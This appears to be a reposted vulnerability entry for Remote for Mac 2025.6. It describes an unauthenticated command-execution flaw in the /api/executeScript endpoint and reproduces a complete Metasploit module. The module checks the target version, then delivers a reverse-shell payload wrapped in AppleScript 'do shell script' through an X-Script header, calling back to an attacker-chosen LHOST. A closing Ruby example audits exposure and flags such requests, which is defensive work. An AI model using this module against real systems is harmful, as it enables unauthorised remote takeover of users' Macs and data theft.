Remote for Mac 2025.6 - Unauthenticated RCE

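Vulnerability Information

Vulnerability name: Remote for Mac 2025.6 - Unauthenticated RCE

Vulnerability ID:

  • CVE: Pending

Vulnerability type: Command execution

Severity: High

Description: This vulnerability affects Remote for Mac version 2025.6, a remote-control application designed for macOS that is widely used in personal and enterprise environments for remote desktop control, file transfer and similar functions. The vulnerability is an unauthenticated remote code execution (RCE) flaw. Its technical root cause is that the software's /api/executeScript endpoint does not correctly enforce authentication, so an attacker can send malicious AppleScript commands without authenticating at all. Because AppleScript can run shell commands through do shell script, an attacker can use the flaw to execute arbitrary commands on the target system and take full control of the affected system. Exploitation requires no user interaction and can be automated, so it poses a serious security threat to users of the software. An attacker can use it for malicious activity such as data exfiltration, service disruption or further penetration of the internal network.

Vendor: Cherpake

Product: Remote for Mac

Affected version: 2025.6

Source: https://github.com/rapid7/metasploit-framework/blob/82c27249de137e90a5c4715564aae8940f55d81f/modules%2Fexploits%2Fosx%2Fhttp%2Fremote_for_mac_rce.rb

Type: rapid7/metasploit-framework:github issues

PoC Details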


##
# Exploit Title: Remote for Mac 2025.6 - Unauthenticated RCE MSF Module
# Date: May 2025
# Exploit Author: Chokri Hammedi (@chokri0x00)
# Vendor Homepage: https://www.cherpake.com/
# Software Link: https://cherpake.com/latest.php?os=mac
# Exploit Source: https://packetstormsecurity.com/files/195347/
# Version: Remote for Mac 2025.6
# Tested on: macOS Mojave, macOS Ventura
##

require 'json'

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Remote for Mac 2025.6 - Unauthenticated RCE',
        'Description' => %q{
          This module exploits an unauthenticated remote code execution vulnerability in
          Remote for Mac 2025.6 via the /api/executeScript endpoint. When authentication is
          disabled on the target system, it allows attackers to execute arbitrary AppleScript
          commands, which can include shell commands via `do shell script`.
        },
        'License' => MSF_LICENSE,
        'Author' => ['Chokri Hammedi (@blue0x1)'],
        'References' => [
          ['URL', 'https://packetstorm.news/files/id/195347/']
        ],
        'DisclosureDate' => '2025-05-27',
        'CVE' => 'Pending',
        'Platform' => 'unix',
        'Arch' => ARCH_CMD,
        'Targets' => [['Auto', {}]],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'RPORT' => 49229,
          'SSL' => true
        },
        'Notes' => {
          'Stability' => [ 'CRASH_SAFE' ],
          'Reliability' => [ 'REPEATABLE_SESSION' ],
          'SideEffects' => [ 'ARTIFACTS_ON_DISK' ]
        }
      )
    )

    register_options([
      Opt::RHOST(),
      Opt::RPORT(49229),
      OptBool.new('SSL', [true, 'Enable SSL/TLS', true]),
      OptString.new('LHOST', [true, 'Local host to receive reverse shell']),
      OptInt.new('LPORT', [true, 'Local port to receive reverse shell', 4444]),
      OptBool.new('FORCE', [false, 'Force exploitation even if checks fail', false])
    ])
  end

  def check
    return CheckCode::Unknown('Skipping version/auth checks (--force)') if datastore['FORCE']

    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'api', 'getVersion'),
      'method' => 'GET',
      'ssl' => datastore['SSL']
    )

    return CheckCode::Unknown('No response from target') unless res && res.code == 200

    begin
      info = JSON.parse(res.body)
    rescue JSON::ParserError
      return CheckCode::Unknown('Unable to parse JSON from /api/getVersion')
    end

    if info['requires.auth'] == true
      return CheckCode::Safe('Target requires authentication on /api/executeScript')
    end

    if info['version'] != '2025.6'
      return CheckCode::Safe("Target version is #{info['version']}, not vulnerable")
    end

    CheckCode::Appears
  end

  def exploit
    unless datastore['FORCE'] || check == CheckCode::Appears
      fail_with(Failure::NotVulnerable, 'Target does not appear vulnerable')
    end

    print_status("Generating reverse shell payload for #{datastore['LHOST']}:#{datastore['LPORT']}")
    cmd = payload.encoded
    escaped = cmd.gsub('\\', '\\\\\\').gsub('"', '\"')
    applescript = %(do shell script "#{escaped}")

    print_status("Sending exploit to #{rhost}:#{rport} via AppleScript")
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'api', 'executeScript'),
      'method' => 'GET',
      'ssl' => datastore['SSL'],
      'headers' => {
        'X-ClientToken' => '1337',
        'X-HostName' => 'iFruit',
        'X-HostFullModel' => 'iFruit19,2',
        'X-Script' => applescript,
        'X-ScriptName' => 'exploit',
        'X-ScriptDelay' => '0'
      }
    )

    if res && res.code == 200
      print_good('Payload delivered successfully. Awaiting session...')
    else
      fail_with(Failure::Unknown, "Unexpected HTTP response: #{res ? res.code : 'no response'}")
    end
  end
end
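
The module's check conditions and request shape can be turned into an exposure audit and a detection rule. The Ruby below is an added example, not part of the Metasploit module or the vendor's code: it classifies a /api/getVersion body in the same order as the module's check, and flags captured requests to /api/executeScript whose X-Script header contains `do shell script`. The function names, the request-hash layout and the sample data are assumptions constructed for illustration.

```ruby
require 'json'

# Added example: field and header names are taken from the module above;
# function names, the request-hash layout and the samples are constructed.
AFFECTED_VERSION = '2025.6'

# Classify a /api/getVersion body in the same order as the module's check,
# so an inventory scan can list hosts that still need authentication enabled.
def classify_version_response(body)
  info = JSON.parse(body.to_s)
  return :unknown unless info.is_a?(Hash)
  return :auth_required if info['requires.auth'] == true
  return :other_version unless info['version'] == AFFECTED_VERSION

  :exposed
rescue JSON::ParserError
  :unknown
end

# True when a captured request targets /api/executeScript and its X-Script
# header (matched case-insensitively) reaches a shell via `do shell script`.
def suspicious_execute_script?(request)
  path = request[:path].to_s.split('?').first.to_s.sub(%r{/+\z}, '')
  return false unless path.end_with?('/api/executeScript')

  headers = request[:headers].to_h.transform_keys { |k| k.to_s.downcase }
  headers['x-script'].to_s.match?(/do\s+shell\s+script/i)
end

# Constructed sample requests, as a TLS-terminating proxy might log them.
SAMPLE_REQUESTS = [
  { method: 'GET', path: '/api/getVersion', headers: { 'X-HostName' => 'office-ipad' } },
  { method: 'GET', path: '/api/executeScript',
    headers: { 'x-script' => 'tell application "Music" to pause' } },
  { method: 'GET', path: '/api/executeScript',
    headers: { 'X-Script' => 'do shell script "uptime"', 'X-ScriptName' => 'exploit' } }
].freeze

def flagged_requests(requests = SAMPLE_REQUESTS)
  requests.select { |r| suspicious_execute_script?(r) }
end

if __FILE__ == $PROGRAM_NAME
  puts classify_version_response('{"version":"2025.6","requires.auth":false}')
  flagged_requests.each { |r| puts "ALERT #{r[:method]} #{r[:path]}" }
end
```

The module defaults to TLS on port 49229, so the header check only works where request headers are visible in cleartext, such as on the host itself or at a TLS-inspecting proxy.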



http://example.com/2025/07/28/github_2324156393/
Author
lianccc
Published on
July 28, 2025
License